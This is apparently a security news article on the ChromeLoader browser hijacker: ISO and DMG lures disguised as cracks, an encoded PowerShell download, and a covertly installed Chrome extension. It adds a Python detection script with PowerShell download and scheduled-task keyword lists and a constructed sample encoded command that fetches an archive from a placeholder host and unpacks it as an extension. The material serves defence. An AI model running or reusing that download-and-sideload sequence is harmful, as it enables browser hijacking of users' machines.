This month has seen an increase in ChromeLoader malware detections. There has been a steady stream of attacks since the beginning of the year.
ChromeLoader is a browser hijacker that modifies the settings of victims’ web browsers to display search results for phoney giveaways, unwanted software, surveys, pornographic games, and dating sites. The malware creators profit from a marketing affiliate system that directs user traffic to advertising websites.
Additionally, Twitter posts promoting cracked Android games and QR codes leading to malware-hosting sites have been discovered.
ChromeLoader is well-known for its size, spread, and persistence.
Use of PowerShell
ChromeLoader compromises its victims by using a malicious ISO archive file. The ISO is disguised as a cracked .exe for a game or programme in order to trick victims into downloading the file themselves from torrent or malicious sites.
In Windows 10 or later, double-clicking the ISO file mounts it as a virtual CD-ROM drive. Inside is CS Installer[.]exe, a .exe file that purports to be a game crack or keygen. When run, ChromeLoader decodes and executes a PowerShell command that retrieves an archive from a remote location; the archive is then installed as a Google Chrome extension.
Once the PowerShell script has removed the scheduled task it used, Chrome is left infected with a covertly injected extension that hijacks the browser and tampers with search engine results.
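The chain above leaves a recognisable trail in process-creation telemetry: a launcher on a mounted image spawning PowerShell with an encoded command that downloads an archive, a scheduled task being created or removed from that script, and Chrome picking up an unpacked extension. The following is an added detection example, not code from the original article or from any vendor report it summarises. It assumes Sysmon-style fields (image, parent image, command line), assumes the extension is sideloaded through Chrome's `--load-extension` switch (the article only says an extension is injected), and uses constructed sample events whose URL, paths and task name are placeholders rather than real indicators.

```python
import base64
import re
from dataclasses import dataclass
from typing import List


@dataclass
class ProcessEvent:
    """Minimal process-creation record (Sysmon Event ID 1 style fields)."""
    image: str          # full path of the new process
    parent_image: str   # full path of the parent process
    command_line: str


# -EncodedCommand accepts any unambiguous prefix; match the common short forms.
ENCODED_FLAG = re.compile(
    r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
DOWNLOAD_TOKENS = ("invoke-webrequest", "iwr ", "downloadfile", "downloadstring",
                   "net.webclient", "start-bitstransfer")
EXTENSION_TOKENS = ("extension", "chrome")
TASK_TOKENS = ("register-scheduledtask", "unregister-scheduledtask", "schtasks")


def decode_encoded_command(command_line: str):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(command_line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> List[str]:
    """Return human-readable findings for one process-creation event."""
    findings = []
    image = event.image.lower()
    parent = event.parent_image.lower()
    cmd = event.command_line.lower()

    if image.endswith("\\powershell.exe"):
        # Weak signal on its own: the launcher lives outside the system drive,
        # which is where a mounted ISO gets its own drive letter on Windows.
        if not parent.startswith("c:\\"):
            findings.append("powershell launched by a binary outside the system drive")
        script = decode_encoded_command(event.command_line)
        if script is not None:
            s = script.lower()
            if any(t in s for t in DOWNLOAD_TOKENS) and any(t in s for t in EXTENSION_TOKENS):
                findings.append("encoded PowerShell fetches remote content and references a browser extension")
            if any(t in s for t in TASK_TOKENS):
                findings.append("encoded PowerShell manipulates a scheduled task")

    # Assumption: the extension is sideloaded as an unpacked directory via --load-extension.
    if image.endswith("\\chrome.exe") and "--load-extension=" in cmd:
        findings.append("chrome started with --load-extension (unpacked extension sideloaded)")

    return findings


def build_encoded(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample script: the URL, paths and task name are placeholders, not real indicators.
SAMPLE_SCRIPT = ("Invoke-WebRequest -Uri https://example.invalid/ext.zip -OutFile $env:TEMP\\ext.zip; "
                 "Expand-Archive $env:TEMP\\ext.zip $env:TEMP\\extension; "
                 "Unregister-ScheduledTask -TaskName PlaceholderTask -Confirm:$false")

PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed events: one matching the described chain, one extension sideload, one benign.
SAMPLE_EVENTS = [
    ProcessEvent(PS, r"D:\CS Installer.exe",
                 "powershell.exe -WindowStyle Hidden -enc " + build_encoded(SAMPLE_SCRIPT)),
    ProcessEvent(CHROME, PS,
                 '"' + CHROME + r'" --load-extension=C:\Users\user\AppData\Local\Temp\extension'),
    ProcessEvent(PS, r"C:\Windows\explorer.exe",
                 "powershell.exe -NoProfile -Command Get-Process"),
]


def scan(events: List[ProcessEvent]):
    """Map each suspicious event's command line to its findings; benign events are dropped."""
    return {e.command_line: analyze(e) for e in events if analyze(e)}


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS).items():
        print(cmdline[:60] + "...")
        for h in hits:
            print("   -", h)
```

Treat the drive-letter check as context rather than a verdict: legitimate installers run from removable media too, so it is the combination of an off-system-drive parent, an encoded download-and-unpack script, and a scheduled-task change that should raise an alert.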
Targets macOS as well
ChromeLoader also targets macOS systems, where it manipulates the Chrome and Safari web browsers. On macOS the infection chain uses DMG (Apple Disk Image) files instead of ISO files.
The new report can aid in the development of a comprehensive defence against ChromeLoader. It also demonstrates how malicious attacks rely on suspicious ISO/DMG files and PowerShell execution. Users can review, restrict, or remove extensions in Chrome and Safari to keep themselves safe.